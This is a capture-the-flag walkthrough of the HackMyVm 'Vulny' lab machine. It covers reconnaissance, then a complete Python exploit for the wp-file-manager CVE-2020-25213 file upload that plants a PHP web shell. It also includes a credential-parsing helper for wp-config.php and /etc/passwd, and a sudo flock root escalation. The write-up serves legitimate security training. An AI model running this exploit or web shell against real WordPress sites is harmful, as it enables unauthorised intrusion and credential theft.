Walkthrough HackMyVm - Vulny


This is a writeup of the Vulny machine on the HackMyVm platform, a VM rated easy; the machine page is linked here if you want to follow along. Let's start.

Reconnaissance

As always, the first step is a port scan. Nmap finds only one open TCP port, HTTP (80). Note that this is the default top-1000-port scan; a full sweep (-p-) is the usual way to confirm nothing else is listening, but for this box port 80 is the only way in:

$ nmap -sC -sV -sT 192.168.1.38
Starting Nmap 7.93 ( https://nmap.org ) at 2023-11-09 03:13 EST
Nmap scan report for 192.168.1.38
Host is up (0.0014s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.81 seconds                                                     

Website


The site only serves the Apache default page, so we need to look for hidden paths or files with a directory brute-force tool such as dirb or dirsearch.

Directory Bruteforce

$ dirsearch -u http://192.168.1.38/ --exclude-status 403,401

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Target: http://192.168.1.38/

[04:12:21] Starting: 
[04:12:49] 200 -   11KB - /index.html                                       
[04:12:51] 301 -  317B  - /javascript  ->  http://192.168.1.38/javascript/  
[04:13:10] 301 -  313B  - /secret  ->  http://192.168.1.38/secret/          
              
Task Completed                                                                                                                             

Two directories turn up: /javascript and /secret. Requesting /javascript returns Forbidden, but /secret is accessible and contains a note.


The note tells us that a WordPress config file on this host contains a username/password. That is odd, because neither Wappalyzer nor wpscan run against the site root shows any sign of WordPress.


Next, we brute-force again with dirsearch, this time under the /secret path.

$ dirsearch -u http://192.168.1.38/secret/ --exclude-status 403,401

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Target: http://192.168.1.38/secret/

[04:32:45] Starting: 
[04:33:29] 200 -    7KB - /secret/readme.html                               
[04:33:42] 301 -  322B  - /secret/wp-admin  ->  http://192.168.1.38/secret/wp-admin/
[04:33:42] 301 -  324B  - /secret/wp-content  ->  http://192.168.1.38/secret/wp-content/
[04:33:42] 500 -  610B  - /secret/wp-content/plugins/akismet/akismet.php    
[04:33:42] 500 -  610B  - /secret/wp-content/plugins/akismet/admin.php      
[04:33:42] 200 -    2KB - /secret/wp-content/                               
[04:33:42] 200 - 1003B  - /secret/wp-content/upgrade/                       
[04:33:42] 200 -    1KB - /secret/wp-content/uploads/                       
[04:33:42] 301 -  325B  - /secret/wp-includes  ->  http://192.168.1.38/secret/wp-includes/
[04:33:43] 500 -    3KB - /secret/wp-admin/setup-config.php                 
[04:33:43] 500 -    0B  - /secret/wp-includes/rss-functions.php             
                                                                        
Task Completed                                                                   

From these results, three WordPress directories were found:

/wp-admin = gives the same response as /secret

/wp-content = Response 200 (the directory is browsable)

/wp-includes = Forbidden

/wp-content is the interesting one: it exposes the /uploads directory, and browsing it reveals that the site runs the wp-file-manager plugin.


Web Exploitation

Browsing http://192.168.1.38/secret/wp-content/uploads/2020/10/ reveals the wp-file-manager version: 6.0. Versions of this plugin before 6.9 expose the elFinder connector (connector.minimal.php) without authentication, which allows unauthenticated arbitrary file upload and therefore remote code execution (CVE-2020-25213). This version is vulnerable!


We download the public exploit and make one small change: since WordPress is not installed at the web root, both plugin URLs in the script get the /secret prefix.

#!/usr/bin/env python3

# Exploit Title: WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE
# Date: [ 22-01-2023 ]
# Exploit Author: [BLY]
# Vendor Homepage: [https://wpscan.com/vulnerability/10389]
# Version: [ File Manager plugin 6.0-6.9]
# Tested on: [ Debian ]
# CVE : [ CVE-2020-25213 ]
#
# Modified for Vulny: WordPress is installed under /secret, so both plugin
# URLs below carry that prefix.

import sys
import signal
import requests
from bs4 import BeautifulSoup


def handler(sig, frame):
    print("[!] Exiting")
    sys.exit(1)


signal.signal(signal.SIGINT, handler)


def commandexec(command):
    # The connector stores uploads in lib/files/ (the root of elFinder's
    # volume); lib/php/../files/ resolves to that directory.
    exec_url = url + "/secret/wp-content/plugins/wp-file-manager/lib/php/../files/shell.php"
    params = {"cmd": command}

    r = requests.get(exec_url, params=params)

    # The web shell wraps its output in <pre>; strip the markup and print the text.
    soup = BeautifulSoup(r.text, "html.parser")
    print(soup.get_text())


def exploit():
    global url

    url = sys.argv[1].rstrip("/")  # tolerate a trailing slash in the base URL
    command = sys.argv[2]
    # Unauthenticated elFinder connector shipped by wp-file-manager < 6.9.
    upload_url = url + "/secret/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"

    headers = {
        "content-type": "multipart/form-data; boundary=----WebKitFormBoundaryvToPIGAB0m9SB1Ww",
        "Connection": "close",
    }

    # elFinder "upload" command. target=l1_Lw is the root of volume l1
    # (lib/files/); upload[] carries a minimal PHP web shell.
    payload = "------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"shell.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php echo \"<pre>\" . shell_exec($_REQUEST['cmd']) . \"</pre>\"; ?>\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww--"

    try:
        r = requests.post(upload_url, data=payload, headers=headers)
        commandexec(command)
    except Exception as e:
        print("[!] Something went wrong:", e)


def help():
    print("\n[*] Usage: python3", sys.argv[0], "\"url\" \"command\"")
    print("[!] Example: python3", sys.argv[0], "http://wordpress.local/ id")


if __name__ == "__main__":
    if len(sys.argv) != 3:
        help()
    else:
        exploit()

Then run the script, e.g. python3 exploit.py http://192.168.1.38 id.


We now have command execution through the uploaded web shell; next we use it to get a proper reverse shell.


With the reverse shell, we check the WordPress config file (wp-config.php) for the username/password the note in /secret hinted at.


idrinksomewater

A password was found. /etc/passwd lists a user named adrian, so we assume the password belongs to that account.
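As an added example (not from the original writeup), the post-exploitation triage described here, written out: pull the DB_* defines out of a wp-config.php and list the local accounts with a regular uid and a real login shell, which are the candidates for trying a recovered password against. The wp-config.php fragment and the /etc/passwd lines below are constructed for the example; only the DB_PASSWORD value is the one the writeup reports finding on Vulny.

```python
import re

# Constructed sample of the define() layout WordPress uses in wp-config.php;
# only the DB_PASSWORD value is the one the writeup reports finding on Vulny.
SAMPLE_WP_CONFIG = """<?php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wpuser' );
define( 'DB_PASSWORD', 'idrinksomewater' );
define( 'DB_HOST', 'localhost' );
define( 'AUTH_KEY', 'put your unique phrase here' );
$table_prefix = 'wp_';
"""

# Constructed /etc/passwd lines for the example.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
mysql:x:112:117:MySQL Server,,,:/nonexistent:/bin/false
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
adrian:x:1000:1000:adrian:/home/adrian:/bin/bash
"""

# define( 'NAME', 'value' ); with either quote style and optional whitespace.
DEFINE_RE = re.compile(
    r"""define\(\s*(['"])(?P<name>[A-Z0-9_]+)\1\s*,\s*(['"])(?P<value>[^'"]*)\3\s*\)""")


def parse_wp_defines(text):
    """All define()d constants in a wp-config.php body as {name: value}."""
    return {m.group("name"): m.group("value") for m in DEFINE_RE.finditer(text)}


def extract_db_credentials(text):
    """The four settings WordPress needs to reach its database (None if absent)."""
    defines = parse_wp_defines(text)
    return {k: defines.get(k) for k in ("DB_HOST", "DB_NAME", "DB_USER", "DB_PASSWORD")}


def login_users(passwd_text, min_uid=1000):
    """Local accounts with a regular uid and a real shell: the ones worth trying
    a recovered password against with su."""
    users = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, uid, shell = fields[0], int(fields[2]), fields[6]
        if uid >= min_uid and uid != 65534 and not shell.endswith(("nologin", "false")):
            users.append(name)
    return users


if __name__ == "__main__":
    print(extract_db_credentials(SAMPLE_WP_CONFIG))  # DB_PASSWORD: idrinksomewater
    print(login_users(SAMPLE_PASSWD))                # ['adrian']
```

On a real box the input would be the output of cat /secret/wp-config.php (or wherever find / -name wp-config.php locates it) and /etc/passwd; the point of the uid/shell filter is to avoid wasting attempts on service accounts that cannot log in anyway.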

Initial Access

Log in as adrian with the password obtained earlier. Since only port 80 is exposed, this is done with su adrian from the reverse shell rather than over SSH, and the password works.


Next we check whether the user has any sudo rights; sudo -l lists the commands adrian is allowed to run.


adrian may run the flock binary through sudo, and we can use it for privilege escalation: flock runs an arbitrary command while holding a lock on a file, so run via sudo it spawns that command as root. The GTFOBins entry for flock is sudo flock -u / /bin/sh.


And root was successfully obtained. Vulny pwned!
